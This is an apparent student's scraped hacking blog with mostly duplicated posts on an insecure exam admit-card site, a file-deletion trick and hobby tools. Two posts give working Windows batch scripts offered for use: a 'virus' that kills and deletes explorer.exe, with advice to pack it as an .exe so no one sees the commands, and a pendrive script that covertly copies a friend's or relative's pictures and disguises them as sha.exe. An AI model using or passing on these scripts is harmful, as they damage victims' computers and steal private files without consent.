1
Security vulnerability on www.cee-kerala.org.
www.cee-kerala.org is a Kerala website which gives entrance details and an option to download admin card. admin card is a simple .pdf file that contains details of the student and the details of exam and exam centre. Day before yesterday when i searched for ma friend's admin card, i noticed that there is no enough security for the entrance student's details. Anyone can download anyone's admin card from there. Admin card contains the full address of the student and a passport size photo.
As anyone can easily download any admin card card, how secure is our photo and address there..? By generating random admin card download links, all the admin cards can be downloaded from there with in two or three hours.
Everyday, lots of Indian websites are being attacked and hacked by Pakistani and Chinese hackers. If the security of data in sites are this much low, no need of them, Kerala people are more than enough.
As anyone can easily download any admin card card, how secure is our photo and address there..? By generating random admin card download links, all the admin cards can be downloaded from there with in two or three hours.
Everyday, lots of Indian websites are being attacked and hacked by Pakistani and Chinese hackers. If the security of data in sites are this much low, no need of them, Kerala people are more than enough.
0
My first 64bit application's GUI is ready...
Hai friends...
Last week i was planning to create an application to automate keystrokes and mouse clicks. I think, this application will be helpful to all the windows users. The development is still on progress. I am damn sure that, this program will help users to automate scrap and SMS sending etc. Its a tiny standalone portable application. As you see in the picture, its easy to use. You can see some numbers in that application (eg: 120, 140 etc), they are mouse positions. That's sample GUI is ready and the back-end will be ready within this month itself. Its source code will be posted in ma blog after its release. Hope, i can do it well.
Feel free to comment this post.
Last week i was planning to create an application to automate keystrokes and mouse clicks. I think, this application will be helpful to all the windows users. The development is still on progress. I am damn sure that, this program will help users to automate scrap and SMS sending etc. Its a tiny standalone portable application. As you see in the picture, its easy to use. You can see some numbers in that application (eg: 120, 140 etc), they are mouse positions. That's sample GUI is ready and the back-end will be ready within this month itself. Its source code will be posted in ma blog after its release. Hope, i can do it well.
Feel free to comment this post.
0
I am back... Lets learn...
Hai friends...
Yaaaa..... Ma exams over....
Hope, you all prayed for us. I am free now. Ma hostel life with ma friends (Thomasskutty, Bibin, Yadhu, and Peter) was very funny. without all of them, that will be exactly like a jail.
I noticed that most teen age students like hacking and they are just googling the word "Hacking" to get more details about hacking. Even me, googled a thousand times when i was in my 10th class. :). Hacking, its an art....
I like to spend my holidays by learning some programming languages and hacking. I think, you all are interested in the same. I will update every new information in this blog about them so that you can also learn.
I just started a SMS channel for you to send ma blog updates via sms. You can subscribe it here.
Last week i just started writing one book "The art of virus coding- DOS edition". It will be finished by this month itself.
Feel free to comment this post.
Yaaaa..... Ma exams over....
Hope, you all prayed for us. I am free now. Ma hostel life with ma friends (Thomasskutty, Bibin, Yadhu, and Peter) was very funny. without all of them, that will be exactly like a jail.
I noticed that most teen age students like hacking and they are just googling the word "Hacking" to get more details about hacking. Even me, googled a thousand times when i was in my 10th class. :). Hacking, its an art....
I like to spend my holidays by learning some programming languages and hacking. I think, you all are interested in the same. I will update every new information in this blog about them so that you can also learn.
I just started a SMS channel for you to send ma blog updates via sms. You can subscribe it here.
Last week i just started writing one book "The art of virus coding- DOS edition". It will be finished by this month itself.
Feel free to comment this post.
1
Will be back soon...
Last week, i joined with my friends in the school hostel, (B.C.S Peruva) as my +2 board exam is starting on 1st April... This will be my last post in this blog. Internet and computer is just as water and air to me, without them i am nothing... I have many ideas and topics in ma mind to write about...
But, in this situation and atmosphere i cant do anything... I hope i can write and post them all after April 28..
So, see you guys... Miss you all....
We need your prayers for the exam..
But, in this situation and atmosphere i cant do anything... I hope i can write and post them all after April 28..
So, see you guys... Miss you all....
We need your prayers for the exam..
0
Delete undeletable Files
I like to spend my month end to sort, clean and arrange the data in my PC. Most of the times I delete more than 2 GB files in one go. I always like to delete unused and unwanted files from my PC as my 320 GB hard disk is not enough for me. And most of the times when I try to delete items from the C drive, I can’t delete some.
Some days before, i got a new trick to delete undeletable files and is 100% working in all Operating Systems.
Follow the steps to delete undeletable files.
1) Open command prompt and leave it open.
2) Open Task Manager and kill the process 'explorer.exe' from the process tab
3) Leave the Task Manager open.
4) In the command prompt window, type 'del /y ' and hit enter.
5) Go back to Task Manager, click File, New Task and enter explorer.exe to start the GUI shell.
Now you can see that the undeletable file is deleted. There are many ways to delete undeletable files, and I suggest this because, it’s the easiest method to do it. Some undeletable files can’t be deleted by this method. I will share a few tricks to delete that types of files, in my coming chapters.
Feel free to comment this post.
Some days before, i got a new trick to delete undeletable files and is 100% working in all Operating Systems.
Follow the steps to delete undeletable files.
1) Open command prompt and leave it open.
2) Open Task Manager and kill the process 'explorer.exe' from the process tab
3) Leave the Task Manager open.
4) In the command prompt window, type 'del /y ' and hit enter.
5) Go back to Task Manager, click File, New Task and enter explorer.exe to start the GUI shell.
Now you can see that the undeletable file is deleted. There are many ways to delete undeletable files, and I suggest this because, it’s the easiest method to do it. Some undeletable files can’t be deleted by this method. I will share a few tricks to delete that types of files, in my coming chapters.
Feel free to comment this post.
1
As we all know, explorer.exe is an essential application that comes with our OS and is very necessary one. Without that application a normal user can’t do anything with his/her computer. With this concept, I just created a virus that damages the whole Operating System (OS) itself. That virus just deletes the application explorer.exe in c:\windows. But its not possible to delete the explorer.exe as the process ecplorer.exe is running in the computer. So, first we have to kill that process before deleting that application. Killing of that process can be done with the help of an application called pskill.exe which is available in the internet within the package PStools. As usual open notepad to type the commands.
So, to kill the process explorer.exe, our first command should be this.
pskill.exe explorer.exe
Next thing we want to do is to delete the explorer.exe. As the explorer.exe is in c:\windows, the second command should be this.
del /f /q c:\Windows\explorer.exe
del is the command to delete, /f is to delete by forcing and /q is to execute the command in quite mode, and c:\Windows\explorer.exe is the file to delete. Now save the file as anything.bat. The application pskill.exe should be in the same folder as the .bat file is.
That’s all you want to do. Now the virus is ready to damage any windows PC. You can convert this application to .exe file so that no one will see the commands we typed. Don’t forget to pack the pskill.exe with the .bat file.
NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.
Feel free to comment this post.
Most simple & dangerous virus, I have ever created.
As we all know, explorer.exe is an essential application that comes with our OS and is very necessary one. Without that application a normal user can’t do anything with his/her computer. With this concept, I just created a virus that damages the whole Operating System (OS) itself. That virus just deletes the application explorer.exe in c:\windows. But its not possible to delete the explorer.exe as the process ecplorer.exe is running in the computer. So, first we have to kill that process before deleting that application. Killing of that process can be done with the help of an application called pskill.exe which is available in the internet within the package PStools. As usual open notepad to type the commands.
So, to kill the process explorer.exe, our first command should be this.
pskill.exe explorer.exe
Next thing we want to do is to delete the explorer.exe. As the explorer.exe is in c:\windows, the second command should be this.
del /f /q c:\Windows\explorer.exe
del is the command to delete, /f is to delete by forcing and /q is to execute the command in quite mode, and c:\Windows\explorer.exe is the file to delete. Now save the file as anything.bat. The application pskill.exe should be in the same folder as the .bat file is.
That’s all you want to do. Now the virus is ready to damage any windows PC. You can convert this application to .exe file so that no one will see the commands we typed. Don’t forget to pack the pskill.exe with the .bat file.
NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.
Feel free to comment this post.
0
Our friends as well as our relatives will not allow us to copy their pictures in their computer. So, if we want their pictures, stealing is the only way to get that files. I have an application, that I created by myself to steal pictures from the ‘My Pictures’ folder. It’s just easy and amazing. You can also create that application by yourselves as these types of applications are not available on the internet. The only software you want to create this application is 7z.exe. If our friend/relative will see his/her pictures in our Pendrive, that we have stolen, he/she may scold us and may delete it too. So we want to hide that stolen pictures in our Pendrive. First we want to make a folder in the Pendrive to copy all the pictures from the ‘My Pictures’ folder. S the command should be this:
md temp
Where md is the command to make directory. After the execution of this command, a new folder named ‘temp’ will be created. Now, we want to copy the pictures from the folder ‘my pictures’ to the folder temp. So the next command should be this.
copy "c:\users\%username%\pictures" %CD%\temp
where the copy is the command to copy files, %CD% denotes the Current Directory, %username% is a variable for the username, and ‘c:\users\%username%\pictures’ is the path to the my pictures. After the execution of the previous command, all the pictures in the folder ‘My Pictures’ will be copies to the folder ‘temp’. Now we have to hide all the pictures. We can just hide all the pictures by zipping all that files into an anything.exe file. Zipping can be done with the help of the application 7z.exe. So the next command should be this.
7z.exe a sha.exe %CD%\temp
Where a is the command to add files to the archive. Now the files are zipped into a file named sha.exe. Now we want to delete the files in the folder ‘temp’ that we have copied earlier. So the net command should be this.
del /q %CD%temp\*.*
Where del is the delete command and /q is for quite mode, and *.* denote all the files.
Now save the file as anything.bat. Now it’s ready to use. By running that anything.bat in the Pendrive, you will get a file named sha.exe. The only thing you want to do to get files inside sha.exe is to extract that file (sha.exe). Its just a small application, but also an amazing one. Its 100% working because, I created it and was successful.
NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.
Feel free to comment this post.
Application to steal pictures from the ‘My Pictures’ folder.
Our friends as well as our relatives will not allow us to copy their pictures in their computer. So, if we want their pictures, stealing is the only way to get that files. I have an application, that I created by myself to steal pictures from the ‘My Pictures’ folder. It’s just easy and amazing. You can also create that application by yourselves as these types of applications are not available on the internet. The only software you want to create this application is 7z.exe. If our friend/relative will see his/her pictures in our Pendrive, that we have stolen, he/she may scold us and may delete it too. So we want to hide that stolen pictures in our Pendrive. First we want to make a folder in the Pendrive to copy all the pictures from the ‘My Pictures’ folder. S the command should be this:
md temp
Where md is the command to make directory. After the execution of this command, a new folder named ‘temp’ will be created. Now, we want to copy the pictures from the folder ‘my pictures’ to the folder temp. So the next command should be this.
copy "c:\users\%username%\pictures" %CD%\temp
where the copy is the command to copy files, %CD% denotes the Current Directory, %username% is a variable for the username, and ‘c:\users\%username%\pictures’ is the path to the my pictures. After the execution of the previous command, all the pictures in the folder ‘My Pictures’ will be copies to the folder ‘temp’. Now we have to hide all the pictures. We can just hide all the pictures by zipping all that files into an anything.exe file. Zipping can be done with the help of the application 7z.exe. So the next command should be this.
7z.exe a sha.exe %CD%\temp
Where a is the command to add files to the archive. Now the files are zipped into a file named sha.exe. Now we want to delete the files in the folder ‘temp’ that we have copied earlier. So the net command should be this.
del /q %CD%temp\*.*
Where del is the delete command and /q is for quite mode, and *.* denote all the files.
Now save the file as anything.bat. Now it’s ready to use. By running that anything.bat in the Pendrive, you will get a file named sha.exe. The only thing you want to do to get files inside sha.exe is to extract that file (sha.exe). Its just a small application, but also an amazing one. Its 100% working because, I created it and was successful.
NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.
Feel free to comment this post.
1
Eject all the drives with one click.
Normally we eject our CDs by pushing the eject button in our CD/DVD drive.
Its a little tough to eject all the drives if we have more than one drives.
I have a program that ejects all the drives in one click.
It help the user to eject all the possible CD/DVD drives with in one click.
After Opening user will be given some time to put the CD/DVD disk into the tray.
That application will un-ejects the drives also.
You can get that application from here.
Feel free to comment.
Its a little tough to eject all the drives if we have more than one drives.
I have a program that ejects all the drives in one click.
It help the user to eject all the possible CD/DVD drives with in one click.
After Opening user will be given some time to put the CD/DVD disk into the tray.
That application will un-ejects the drives also.
You can get that application from here.
Feel free to comment.
Subscribe to:
Posts (Atom)
















![[Image]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCcBijz1mrozMbRb6N62G8FQh72MmiCEu4fevzgDlowCuWIG1TBsvBlcjROcsVEgvORfxVNRbh5sdheyJlA3M2ikg09JzbQnq-VnoAa98K4hNVvaiXfqIIKJKfwLueRA_qmh8lKZQGDhqW/s1600/Untitled-1.gif)



